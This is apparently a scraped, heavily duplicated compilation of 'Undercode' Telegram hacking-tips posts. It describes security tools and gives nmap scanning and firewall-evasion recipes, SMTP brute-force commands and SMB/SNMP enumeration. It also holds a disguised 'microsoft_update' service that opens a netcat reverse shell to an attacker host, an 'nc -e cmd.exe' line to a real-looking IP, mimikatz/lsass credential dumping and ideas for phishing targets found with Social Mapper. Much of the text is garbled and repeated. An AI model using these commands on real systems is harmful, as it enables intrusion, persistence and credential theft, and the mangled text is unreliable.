42) Xprobe2
Xprobe2 actively detects the characteristics of the ICMP datagram corresponding to the datagram through fuzzy matrix statistical analysis, and then detects the type of the remote operating system.
43() EtherApe
The network sniffer can perform the same functions as Tcpdump, but the operationwritten by undercode interface is much more friendly. Both Ehtereal and Tcpdump rely on the pcap library (libpcap), so the two are very similar in many ways (for example, they use the same filtering rules and keywords). Ethereal uses the same as other graphical network sniffer.
Fourth, Core Impact is
recognized as the strongest vulnerability detection tool, comprehensive assessment and detection, prevention and response to information security threats. By safely replicating real-world attacks on network servers and workstations, end-user systems, and web applications, you can assist in finding and fixing security issues.
45) IDA Pro
is an interactive "analyst". However, it does not automatically solve problems. IDA Pro will find suspicious instructions and will not solve these problems. Your job is to inform IDA how to do it.
46) ββSolarWinds is
a professional network management software that can monitor and discover network devices. The following tools are included:
1) Network Performance Monitoring: Bandwidth measurement, routing CPU load, bandwidth monitoring, CPU measurement, network performance monitor, SNMP image and advanced CPU upload.
2) Network Discovery: List of subnets, Ping Sweep, and IP web browser, DNS verification, IP address management, MAC address discovery, SNMP Sweep, network positioning
3) Tools for Cisco networks: IP web browser, routing CPU load, configuration download, configuration upload, configuration editor / browser, proxy ping, comparative running VS startup configuration, router password encryption, CPU measurement And advanced CPU upload
4) Network monitoring: Watch It !, network monitor, Syslog server, routing CPU load, advanced ping and network performance monitor.
5) IP Address Management: Advanced subnet calculator, DNS / Who Is Resolver, DHCP Scope Monitor, DNS verification, IP address management, Ping Sweep.
6) Security (Security): routing security check, TCP Reset, dictionary editor, SNMP Brute Force attack, SNMP dictionary attack, router password encryption.
7) Ping & Diagnostic: ping, advanced ping, Trace Route, Proxy Ping, Ping Sweep.
8) MIB browser: MIB Walk, update system MIBs, MIB browser, MIB browser and SNMP images.
9) Others: TFTP server, WAN Killer, Wake-On-Line.
Xprobe2 actively detects the characteristics of the ICMP datagram corresponding to the datagram through fuzzy matrix statistical analysis, and then detects the type of the remote operating system.
43() EtherApe
The network sniffer can perform the same functions as Tcpdump, but the operationwritten by undercode interface is much more friendly. Both Ehtereal and Tcpdump rely on the pcap library (libpcap), so the two are very similar in many ways (for example, they use the same filtering rules and keywords). Ethereal uses the same as other graphical network sniffer.
Fourth, Core Impact is
recognized as the strongest vulnerability detection tool, comprehensive assessment and detection, prevention and response to information security threats. By safely replicating real-world attacks on network servers and workstations, end-user systems, and web applications, you can assist in finding and fixing security issues.
45) IDA Pro
is an interactive "analyst". However, it does not automatically solve problems. IDA Pro will find suspicious instructions and will not solve these problems. Your job is to inform IDA how to do it.
46) ββSolarWinds is
a professional network management software that can monitor and discover network devices. The following tools are included:
1) Network Performance Monitoring: Bandwidth measurement, routing CPU load, bandwidth monitoring, CPU measurement, network performance monitor, SNMP image and advanced CPU upload.
2) Network Discovery: List of subnets, Ping Sweep, and IP web browser, DNS verification, IP address management, MAC address discovery, SNMP Sweep, network positioning
3) Tools for Cisco networks: IP web browser, routing CPU load, configuration download, configuration upload, configuration editor / browser, proxy ping, comparative running VS startup configuration, router password encryption, CPU measurement And advanced CPU upload
4) Network monitoring: Watch It !, network monitor, Syslog server, routing CPU load, advanced ping and network performance monitor.
5) IP Address Management: Advanced subnet calculator, DNS / Who Is Resolver, DHCP Scope Monitor, DNS verification, IP address management, Ping Sweep.
6) Security (Security): routing security check, TCP Reset, dictionary editor, SNMP Brute Force attack, SNMP dictionary attack, router password encryption.
7) Ping & Diagnostic: ping, advanced ping, Trace Route, Proxy Ping, Ping Sweep.
8) MIB browser: MIB Walk, update system MIBs, MIB browser, MIB browser and SNMP images.
9) Others: TFTP server, WAN Killer, Wake-On-Line.
47) Pwdump: a tool for grabbing password files of Windows users.
Forty-eight, LSoF
full name list opened files, which is to list the files that have been opened in the system. We know that everything in the Linux environment is a file, the device is a file, the directory is a file, and even sockets are files. Therefore, using the lsof command is very helpful for daily Linux management.
49) RainbowCrack is
a multi-functional password cracking software, which not only can crack passwords, but also is a cracking tool for messy algorithm encryption. For example, it can crack im, md5, sha1, customizable, etc., other encryption methods can also be added to the software. The software supports both Windows and Linux systems, and the forms generated on one system can be directly converted to another system for use. Although it is powerful, it is more complicated to use.
50) Firewalk
Linux network security tools use similar traceroute technology to analyze IP packet responses to determine gateway access control lists and tools for drawing network graphs.
51) An
easy-to-use IP and port scanning tool for Angry IP Scanner , which can obtain the ping response time, host name, computer name, workgroup, login user name, MAC address, TTL, NetBios information of the scanned computer, etc. You can specify the scan port to view the open port of the target computer; for the active host, you can perform operations such as opening in the resource manager, browsing with a web browser, FTP, telnet, ping, tracert or using the web page to find the geographic location of the specified IP . With just a web address or host name, Angry IP Scanner can automatically resolve its IP address and scan it. Angry IP Scanner also supports automatic selection and scanning of entire Class B and Class C IP segments, collection and management of commonly used IPs, and export of scan results to multiple file formats. Due to the multi-threaded scanning, Angry IP Scanner can scan dozens of IPs at the same time, so it is extremely fast.
52) RKHunter's
Chinese name "Rootkit Hunter" can find about 58 known rootkits and some sniffer and backdoor programs. It performs a series of test scripts to confirm whether the machine has been infected with rootkits.
53) Ike-scan is
a tool for detecting the transmission characteristics of IKE (Internet Key Exchange) service. IKE is a mechanism for establishing a connection between a server and a remote client in a VPN network. After the IP address of the VPN server is scanned, the reconstructed IKE data packet is distributed to each host in the VPN network. As long as the host running IKE will send back feedback to confirm its existence. The tool then records and displays these feedback packets and compares them with a series of known VPN product fingerprints.
54) Arpwatch
ARP (Address Resolution Protocol) is a protocol used to resolve IP and hardware addresses of network devices. Under Linux system, arpwatch can monitor and record ARP packets in the regional network, and report the monitored changes through E-mail.
55) KisMAC is
a free wireless protocol sniffing program that can be used in Mac OX operating system. The KisMAC application does not securely change file permissions during installation. Local attackers can use this vulnerability to gain unauthorized access to sensitive file information.
Forty-eight, LSoF
full name list opened files, which is to list the files that have been opened in the system. We know that everything in the Linux environment is a file, the device is a file, the directory is a file, and even sockets are files. Therefore, using the lsof command is very helpful for daily Linux management.
49) RainbowCrack is
a multi-functional password cracking software, which not only can crack passwords, but also is a cracking tool for messy algorithm encryption. For example, it can crack im, md5, sha1, customizable, etc., other encryption methods can also be added to the software. The software supports both Windows and Linux systems, and the forms generated on one system can be directly converted to another system for use. Although it is powerful, it is more complicated to use.
50) Firewalk
Linux network security tools use similar traceroute technology to analyze IP packet responses to determine gateway access control lists and tools for drawing network graphs.
51) An
easy-to-use IP and port scanning tool for Angry IP Scanner , which can obtain the ping response time, host name, computer name, workgroup, login user name, MAC address, TTL, NetBios information of the scanned computer, etc. You can specify the scan port to view the open port of the target computer; for the active host, you can perform operations such as opening in the resource manager, browsing with a web browser, FTP, telnet, ping, tracert or using the web page to find the geographic location of the specified IP . With just a web address or host name, Angry IP Scanner can automatically resolve its IP address and scan it. Angry IP Scanner also supports automatic selection and scanning of entire Class B and Class C IP segments, collection and management of commonly used IPs, and export of scan results to multiple file formats. Due to the multi-threaded scanning, Angry IP Scanner can scan dozens of IPs at the same time, so it is extremely fast.
52) RKHunter's
Chinese name "Rootkit Hunter" can find about 58 known rootkits and some sniffer and backdoor programs. It performs a series of test scripts to confirm whether the machine has been infected with rootkits.
53) Ike-scan is
a tool for detecting the transmission characteristics of IKE (Internet Key Exchange) service. IKE is a mechanism for establishing a connection between a server and a remote client in a VPN network. After the IP address of the VPN server is scanned, the reconstructed IKE data packet is distributed to each host in the VPN network. As long as the host running IKE will send back feedback to confirm its existence. The tool then records and displays these feedback packets and compares them with a series of known VPN product fingerprints.
54) Arpwatch
ARP (Address Resolution Protocol) is a protocol used to resolve IP and hardware addresses of network devices. Under Linux system, arpwatch can monitor and record ARP packets in the regional network, and report the monitored changes through E-mail.
55) KisMAC is
a free wireless protocol sniffing program that can be used in Mac OX operating system. The KisMAC application does not securely change file permissions during installation. Local attackers can use this vulnerability to gain unauthorized access to sensitive file information.
56) OSSEC HIDS is
an open source intrusion detection system, including log analysis, comprehensive detection, rook-kit detection. As a HIDS, OSSEC should be installed in a monitoring system. In addition, sometimes it is not necessary to install the full version of OSSEC. If multiple computers are installed with OSSEC, you can use the client / server mode to run. The client sends the data back to the server for analysis through the client program. Monitoring multiple systems on one computer is quite economical and practical for business or home users. The biggest advantage of OSSEC is that it can run on almost any operating system, such as Windows, Linux, OpenBSD / FreeBSD and MacOS. However, clients running on Windows cannot implement root-kit detection, and clients on other systems have no problems.
57) Openbsd PF
OpenBSD users love to use PF, which is their firewall tool. Functions include network address translation, management of TCP / IP communications, bandwidth control, and packet grading control. It also has some additional features, such as passive operating system detection. PF was written by the same people who wrote OpenBSD, and it has been well evaluated, designed, and coded to avoid exposing similar vulnerabilities in other packet filters.
58) Nemesis: It can be used to construct almost any type of ICMP packet.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
an open source intrusion detection system, including log analysis, comprehensive detection, rook-kit detection. As a HIDS, OSSEC should be installed in a monitoring system. In addition, sometimes it is not necessary to install the full version of OSSEC. If multiple computers are installed with OSSEC, you can use the client / server mode to run. The client sends the data back to the server for analysis through the client program. Monitoring multiple systems on one computer is quite economical and practical for business or home users. The biggest advantage of OSSEC is that it can run on almost any operating system, such as Windows, Linux, OpenBSD / FreeBSD and MacOS. However, clients running on Windows cannot implement root-kit detection, and clients on other systems have no problems.
57) Openbsd PF
OpenBSD users love to use PF, which is their firewall tool. Functions include network address translation, management of TCP / IP communications, bandwidth control, and packet grading control. It also has some additional features, such as passive operating system detection. PF was written by the same people who wrote OpenBSD, and it has been well evaluated, designed, and coded to avoid exposing similar vulnerabilities in other packet filters.
58) Nemesis: It can be used to construct almost any type of ICMP packet.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 57 MOST DANGEROUS TOOLS TESTED- Use for secure not for harm πΏ
#SUPPORT & SHARE
T.me/UndercodeTesting
#SUPPORT & SHARE
T.me/UndercodeTesting
π¦ Collection of practical skills of penetration testing Fast tips @undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Best NMAP scanning strategy
# The best nmap scanning strategy for all sizes of networks # Host discovery, generating a list of live hosts $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
> $ grep "Status: Up" Discovery. gnmap | cut -f 2 -d '' > LiveHosts.txt # Port discovery, found most commonly used ports # https://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4- Pn -oG TopTCP -iL LiveHosts.txt
> $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
> $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # port discovery , Found all ports, but the scanning of UDP ports will be very slow $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
> $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # Display TCP \ UDP port $ grep"open" FullTCP | cut -f 1 -d '' | sort -nu | cut -f 1 -d '/' | xargs | sed 's / /, / g' | awk '{print "T:" $ 0} ' $ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d ' / ' | xargs | sed ' s / /, / g ' | awk ' {print "U: "$ 0} '
# Detect service version $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt # Scan system scan $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt # System and service Detect $ nmap -O -sV -T4 -Pn -p U: 53,111,137, T: 21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts. txt
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Best NMAP scanning strategy
# The best nmap scanning strategy for all sizes of networks # Host discovery, generating a list of live hosts $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
> $ grep "Status: Up" Discovery. gnmap | cut -f 2 -d '' > LiveHosts.txt # Port discovery, found most commonly used ports # https://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4- Pn -oG TopTCP -iL LiveHosts.txt
> $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
> $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # port discovery , Found all ports, but the scanning of UDP ports will be very slow $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
> $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # Display TCP \ UDP port $ grep"open" FullTCP | cut -f 1 -d '' | sort -nu | cut -f 1 -d '/' | xargs | sed 's / /, / g' | awk '{print "T:" $ 0} ' $ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d ' / ' | xargs | sed ' s / /, / g ' | awk ' {print "U: "$ 0} '
# Detect service version $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt # Scan system scan $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt # System and service Detect $ nmap -O -sV -T4 -Pn -p U: 53,111,137, T: 21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts. txt
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap Perform web vulnerability scanning
fb.com/undercodeTesting
> cd / usr / share / nmap / scripts /
> wget https://nmap down> from git or site
> nmap_nse_vulscan-2.0.tar.gz&& tar xzf nmap_nse_vulscan-2.0.tar.gz
> nmap -sS -sV --script = vulscan / vulscan.nse target
> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv target
> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv -p80 target
> nmap -PN -sS -sV --script = vulscan --script-args vulscancorrelation = 1 -p80 target
> nmap -sV --script = vuln target
nmap -PN -sS -sV --script = all --script-args vulscancorrelation = 1 target
π¦ use DIRB blasting directory
Note: DIRB is a tool dedicated to blasting directories, which has been installed by default in Kali, Similar tools include foreign patator , dirsearch , DirBuster , domestic sword and so on.
> dirb http: / / IP: PORT / usr/ share / dirb / wordlists / common .txt
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap Perform web vulnerability scanning
fb.com/undercodeTesting
> cd / usr / share / nmap / scripts /
> wget https://nmap down> from git or site
> nmap_nse_vulscan-2.0.tar.gz&& tar xzf nmap_nse_vulscan-2.0.tar.gz
> nmap -sS -sV --script = vulscan / vulscan.nse target
> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv target
> nmap -sS -sV --script = vulscan / vulscan.nse --script-args vulscandb = scipvuldb.csv -p80 target
> nmap -PN -sS -sV --script = vulscan --script-args vulscancorrelation = 1 -p80 target
> nmap -sV --script = vuln target
nmap -PN -sS -sV --script = all --script-args vulscancorrelation = 1 target
π¦ use DIRB blasting directory
Note: DIRB is a tool dedicated to blasting directories, which has been installed by default in Kali, Similar tools include foreign patator , dirsearch , DirBuster , domestic sword and so on.
> dirb http: / / IP: PORT / usr/ share / dirb / wordlists / common .txt
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap β avoid firewall :
# segment
> $ nmap -f# Modify the default MTU size, but it must be a multiple of 8 (8, 16, 24, 32, etc.)
> $ nmap --mtu 24 # Generate a random amount of spoofing
> $ nmap -D RND: 10 [target] # Manually specify the use of spoofing IP
> $ nmap -D decoy1, decoy2, decoy3 etc. # botnet scan, first need to find the botnet's IP
> $ nmap -sI [Zombie IP] [Target IP] # specify the source port number $ nmap --source-port 80 IP # Append a random amount of data after each scanned data packet
> $ nmap --data-length 25 IP # MAC address spoofing can generate MAC addresses of different hosts $ nmap --spoof-mac Dell / Apple / 3 Com IP
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Nmap β avoid firewall :
# segment
> $ nmap -f# Modify the default MTU size, but it must be a multiple of 8 (8, 16, 24, 32, etc.)
> $ nmap --mtu 24 # Generate a random amount of spoofing
> $ nmap -D RND: 10 [target] # Manually specify the use of spoofing IP
> $ nmap -D decoy1, decoy2, decoy3 etc. # botnet scan, first need to find the botnet's IP
> $ nmap -sI [Zombie IP] [Target IP] # specify the source port number $ nmap --source-port 80 IP # Append a random amount of data after each scanned data packet
> $ nmap --data-length 25 IP # MAC address spoofing can generate MAC addresses of different hosts $ nmap --spoof-mac Dell / Apple / 3 Com IP
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦More Pratical hacking tips by undercode:
t.me/undercodeTesting
π¦ Patator β all-around brute force testing tool
# git clone https://github.com/lanjelot/patator.git / usr / share / patator # SMTP blast
$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst
$ patator smtp_login host = 192.168 . 17.129 user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst
$ patator smtp_login host =192.168 . 17.129 helo = 'ehlo 192.168.17.128' user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst
$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst -x ignore: fgrep = 'incorrect password or account name'
π¦ Use Fierce to blast DNS
Note: Fierce will check whether the DNS server allows zone transfer. If allowed, zone transfer will be performed and the user will be notified. If not allowed, the host name can be enumerated by querying the DNS server. Similar tools: subDomainsBrute andSubBrute etc.
# https://ha.ckers.org/fierce/ $ ./fierce.pl -dns example.com
$ ./fierce.pl -dns example.com -wordlist myWordList.txt
use Nikto scan Web Services
Nikto - C all -h https: // IPScan
π¦WordPress
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan --url https: // IP / --enumerate p
π¦HTTP fingerprint recognition
wget http: / /www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip cd httprint_301 / linux / ./httprint -h http: // IP -s signatures.txt
scan with Skipfish
Note: Skipfish is a web application security investigation tool. Skipfish will use recursive crawlers and dictionary-based probes to generate an interactive website map. The resulting map will be output after passing security checks.
skipfish -m 5 -LY -S / usr / share / skipfish / dictionaries / complete.wl -o ./skipfish2 -u http: // IP
π¦uses NC to scan
nc -v -w 1 target -z 1-1000 for i in {101..102}; do nc -vv -n -w 1 192.168.56. $ I 21-25 -z; done
π¦Unicornscan
Note: Unicornscan is a tool for information collection and security audit.
us -H -msf -Iv 192 .168 .56 .101 -p 1 -65535 us -H -mU -Iv 192 .168 .56 .101 -p . 1 -65535 -H resolve the host name in the report generation stage -m scan type ( SF - TCP , the U- - UDP ) -Iv - detail
using the operating system fingerprint identification Xprobe2
Xprobe2 -v - p tcp : 80 : open IP
π¦enumeration Samba
nmblookup -A target
smbclient // MOUNT / share -I target -N rpcclient -U "" target
enum4linux target
π¦enumeration SNMP
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
practical Windows cmd command
net localgroup Users
net localgroup Administrators
search dir / s * .doc system ( "start cmd.exe / k $ cmd" )
sc create microsoft_update binpath = "cmd / K start c: \ nc.exe -d ip-of-hacker port -e cmd.exe" start = auto error = ignore
/ c C: \ nc.exe -ec: \ windows \ system32 \ cmd.exe -vv 23.92 . 17.103 7779 mimikatz.exe "privilege :: debug" "log" "sekurlsa :: logonpasswords"Procdump.exe -accepteula- ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa :: minidump lsass.dmp" "log" "sekurlsa :: logonpasswords" C: \ temp \ procdump.exe -accepteula- ma lsass.exe lsass .dmp 32 -bit system
C: \ temp \ procdump.exe -accepteula- 64 - ma lsass.exe lsass.dmp 64 -bit system
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦More Pratical hacking tips by undercode:
t.me/undercodeTesting
π¦ Patator β all-around brute force testing tool
# git clone https://github.com/lanjelot/patator.git / usr / share / patator # SMTP blast
$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst
$ patator smtp_login host = 192.168 . 17.129 user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst
$ patator smtp_login host =192.168 . 17.129 helo = 'ehlo 192.168.17.128' user = FILE1 password = FILE 0 0 = / usr / share / john / password .lst 1 = / usr / share / john / usernames .lst
$ patator smtp_login host = 192.168 . 17.129 user = Ololena password = FILE 0 0 = / usr / share / john / password .lst -x ignore: fgrep = 'incorrect password or account name'
π¦ Use Fierce to blast DNS
Note: Fierce will check whether the DNS server allows zone transfer. If allowed, zone transfer will be performed and the user will be notified. If not allowed, the host name can be enumerated by querying the DNS server. Similar tools: subDomainsBrute andSubBrute etc.
# https://ha.ckers.org/fierce/ $ ./fierce.pl -dns example.com
$ ./fierce.pl -dns example.com -wordlist myWordList.txt
use Nikto scan Web Services
Nikto - C all -h https: // IPScan
π¦WordPress
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan --url https: // IP / --enumerate p
π¦HTTP fingerprint recognition
wget http: / /www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip cd httprint_301 / linux / ./httprint -h http: // IP -s signatures.txt
scan with Skipfish
Note: Skipfish is a web application security investigation tool. Skipfish will use recursive crawlers and dictionary-based probes to generate an interactive website map. The resulting map will be output after passing security checks.
skipfish -m 5 -LY -S / usr / share / skipfish / dictionaries / complete.wl -o ./skipfish2 -u http: // IP
π¦uses NC to scan
nc -v -w 1 target -z 1-1000 for i in {101..102}; do nc -vv -n -w 1 192.168.56. $ I 21-25 -z; done
π¦Unicornscan
Note: Unicornscan is a tool for information collection and security audit.
us -H -msf -Iv 192 .168 .56 .101 -p 1 -65535 us -H -mU -Iv 192 .168 .56 .101 -p . 1 -65535 -H resolve the host name in the report generation stage -m scan type ( SF - TCP , the U- - UDP ) -Iv - detail
using the operating system fingerprint identification Xprobe2
Xprobe2 -v - p tcp : 80 : open IP
π¦enumeration Samba
nmblookup -A target
smbclient // MOUNT / share -I target -N rpcclient -U "" target
enum4linux target
π¦enumeration SNMP
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
practical Windows cmd command
net localgroup Users
net localgroup Administrators
search dir / s * .doc system ( "start cmd.exe / k $ cmd" )
sc create microsoft_update binpath = "cmd / K start c: \ nc.exe -d ip-of-hacker port -e cmd.exe" start = auto error = ignore
/ c C: \ nc.exe -ec: \ windows \ system32 \ cmd.exe -vv 23.92 . 17.103 7779 mimikatz.exe "privilege :: debug" "log" "sekurlsa :: logonpasswords"Procdump.exe -accepteula- ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa :: minidump lsass.dmp" "log" "sekurlsa :: logonpasswords" C: \ temp \ procdump.exe -accepteula- ma lsass.exe lsass .dmp 32 -bit system
C: \ temp \ procdump.exe -accepteula- 64 - ma lsass.exe lsass.dmp 64 -bit system
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
This media is not supported in your browser
VIEW IN TELEGRAM
π¦ you can get last hackers & Undercode news on: twitter.com/UndercodeNews π
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What about hijack wifi ?
1) Hijacker is a penetration testing tool with a graphical user interface. The tool integrates several well-known WiFi penetration tools, such as Aircrack-ng, Airodump-ng, MDK3, Reaver, etc.
2) Hijacker provides a simple and easy-to-use UI interface, users do not have to manually enter commands or copy and paste MAC addresses on the console.
3) This application is only available in the Android version (ARM) and requires the device to have a wireless network card that supports Monitor Mode. At present, only a few devices meet the requirements, so you may need to use custom firmware.
4) Nexus 5 and other devices that use the BCM4399 chip can install Nexmon [ download address ], and devices that use the BCM4300 chip can choose to install bcmon [ download address ].
Note: The device needs Root to use the tool
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What about hijack wifi ?
1) Hijacker is a penetration testing tool with a graphical user interface. The tool integrates several well-known WiFi penetration tools, such as Aircrack-ng, Airodump-ng, MDK3, Reaver, etc.
2) Hijacker provides a simple and easy-to-use UI interface, users do not have to manually enter commands or copy and paste MAC addresses on the console.
3) This application is only available in the Android version (ARM) and requires the device to have a wireless network card that supports Monitor Mode. At present, only a few devices meet the requirements, so you may need to use custom firmware.
4) Nexus 5 and other devices that use the BCM4399 chip can install Nexmon [ download address ], and devices that use the BCM4300 chip can choose to install bcmon [ download address ].
Note: The device needs Root to use the tool
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How Social Mapper open source smart tools work ?
But, "What if it can be done automatically and on a large scale with hundreds or thousands of people?"
π¦ Social Mapper runs through three phases:
> Phase 1- The tool is based on what you provide The input of creates a target list (consisting of name and picture). The list can be provided through a link in the CSV file, an image in the folder, or someone registered on LinkedIn on the company.
> Stage 2- Once the target is processed, the second stage of Social Mapper automatically starts online search for social media sites to obtain the target.Researchers recommend running the tool overnight via a good Internet connection, because searching can take more than 15 hours to get a list of 1,000 people and use a lot of bandwidth.
> After the third stage search, the third stage of Social Mapper starts generating reports, such as a spreadsheet that contains a link to the profile page of the target list, or a more intuitive HTML report that contains photos for quick inspection and verification results.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How Social Mapper open source smart tools work ?
But, "What if it can be done automatically and on a large scale with hundreds or thousands of people?"
π¦ Social Mapper runs through three phases:
> Phase 1- The tool is based on what you provide The input of creates a target list (consisting of name and picture). The list can be provided through a link in the CSV file, an image in the folder, or someone registered on LinkedIn on the company.
> Stage 2- Once the target is processed, the second stage of Social Mapper automatically starts online search for social media sites to obtain the target.Researchers recommend running the tool overnight via a good Internet connection, because searching can take more than 15 hours to get a list of 1,000 people and use a lot of bandwidth.
> After the third stage search, the third stage of Social Mapper starts generating reports, such as a spreadsheet that contains a link to the profile page of the target list, or a more intuitive HTML report that contains photos for quick inspection and verification results.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ABOUT SOCIAL MEDIA TRACKING :
What could go wrong?
1) Although the end result is ideal for promoting highly complex phishing activities or intelligence gathering, Trustwave said it will help security professionals and ethical hackers provide the same tools as bad guys to test customers' security.
2) However, because the tool is now available in open source, anyone including bad guys or intelligence agencies can reuse facial recognition technology to build their own monitoring tools to search for the large amount of data that has been collected. further outlines some evil uses of the social mapper.
3) Once you have mastered the end result, these uses are limited to "only your imagination", which shows that it can be used for:
π¦ ππΌππ πππΈβπ :
1) Create a fake social media profile for the "friends" target, and then send its link to downloadable malware or obtain credentials for landing pages.
The goal of spoofing is to disclose their emails and phone numbers through vouchers and offers to turn to "phishing, predatory or predatory."
2) Create custom phishing campaigns for each social media platform, make sure the target has an account, and make these more real by including their profile picture in the email. Then capture the password to reuse it.
3) Look at the photo of the target, find the badge of the employee visit card, and get familiar with the interior of the building.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ABOUT SOCIAL MEDIA TRACKING :
What could go wrong?
1) Although the end result is ideal for promoting highly complex phishing activities or intelligence gathering, Trustwave said it will help security professionals and ethical hackers provide the same tools as bad guys to test customers' security.
2) However, because the tool is now available in open source, anyone including bad guys or intelligence agencies can reuse facial recognition technology to build their own monitoring tools to search for the large amount of data that has been collected. further outlines some evil uses of the social mapper.
3) Once you have mastered the end result, these uses are limited to "only your imagination", which shows that it can be used for:
π¦ ππΌππ πππΈβπ :
1) Create a fake social media profile for the "friends" target, and then send its link to downloadable malware or obtain credentials for landing pages.
The goal of spoofing is to disclose their emails and phone numbers through vouchers and offers to turn to "phishing, predatory or predatory."
2) Create custom phishing campaigns for each social media platform, make sure the target has an account, and make these more real by including their profile picture in the email. Then capture the password to reuse it.
3) Look at the photo of the target, find the badge of the employee visit card, and get familiar with the interior of the building.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Detailed IP address summary
t.me/undercodeTesting
1) Classified IP address
Each type of address has another fixed-length field.
Network number: net-idβmarks the network to which the host (or router) is connected.
2) Host number: host-idβmarks that the host (or router)
two-level IP address can Expressed as:
IP address: = {<network number>, <host number>}
:: = stands for "defined as"
Class A address: network field number 1 byte 8 bits
Class B address: network field number 2 words Section 16-bit
class C address: Network field number 3 bytes 24 bits
π¦ Some important characteristics of
IP address 1): IP address is a hierarchical address structure, the benefits of two levels
First: When the IP address management means to assign IP addresses,
assigned network number only
host number obtained by the number of units of the network Discretionary
second: The destination host number only router connected
to a network packet forwarding numbers
so it can make The number of entries in the routing table is greatly reduced, thereby reducing the
storage space occupied by the routing table.
Third:
The network numbers in the IP addresses of hosts or routers in the same local area network must be the same.
Fourth: The router always has two or more IP addresses
. Each interface of the router has an IP address with a different network number.
Fifth: The resolution from the IP address to the hardware address is automatic. The user of the host I
do nβt know this process of address resolution.
As long as the host or router wants
to communicate with another host or router with a known IP address on the network, the ARP protocol will automatically
resolve the IP address to the link layer. Hardware address
π¦ Detailed IP address summary
t.me/undercodeTesting
1) Classified IP address
Each type of address has another fixed-length field.
Network number: net-idβmarks the network to which the host (or router) is connected.
2) Host number: host-idβmarks that the host (or router)
two-level IP address can Expressed as:
IP address: = {<network number>, <host number>}
:: = stands for "defined as"
Class A address: network field number 1 byte 8 bits
Class B address: network field number 2 words Section 16-bit
class C address: Network field number 3 bytes 24 bits
π¦ Some important characteristics of
IP address 1): IP address is a hierarchical address structure, the benefits of two levels
